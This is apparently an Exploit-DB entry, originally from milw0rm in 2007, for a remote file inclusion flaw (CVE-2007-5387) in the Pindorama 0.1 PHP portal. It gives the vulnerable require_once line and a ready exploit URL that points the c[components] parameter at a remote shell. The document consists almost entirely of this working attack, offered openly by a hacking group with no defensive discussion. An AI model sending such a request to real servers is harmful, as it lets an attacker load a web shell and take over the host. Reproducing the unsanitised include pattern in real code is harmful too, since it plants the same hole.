Pindorama 0.1 - 'client.php' Remote File Inclusion
Author: S.W.A.T.
type: webapps
platform: php
port:
date_added: 2007-10-10
date_updated: 2016-10-20
verified: 1
codes: OSVDB-37879;CVE-2007-5387
tags:
aliases:
screenshot_url:
application_url: http://www.exploit-db.compindorama-0.1.zip
\\\|///
\\ - - // Xmors Underground Group
( @ @ )
----oOOo--(_)-oOOo--------------------------------------------------
Portal : Pindorama 0.1
Download : http://downloads.sourceforge.net/pindorama/pindorama-0.1.zip
Author : S.W.A.T.
HomePage : wWw.XmorS.CoM
Type : Remote File Inclusion
Y! ID : Svvateam
E-Mail : Svvateam@yahoo.com / S.W.4.T@hackermail.com
Dork : :(
----ooooO-----Ooooo--------------------------------------------------
( ) ( )
\ ( ) /
\_) (_/
+---------------------------------------------------------------------------------------------+
Vuln Code :
require_once($c["components"]."xmlrpc/common.php");
+---------------------------------------------------------------------------------------------+
+---------------------------------------------------------------------------------------------+
Exploit :
http://[TARGET]/[PATH]/active/components/xmlrpc/client.php?c[components]=[-Sh3ll-]
+---------------------------------------------------------------------------------------------+
# milw0rm.com [2007-10-11]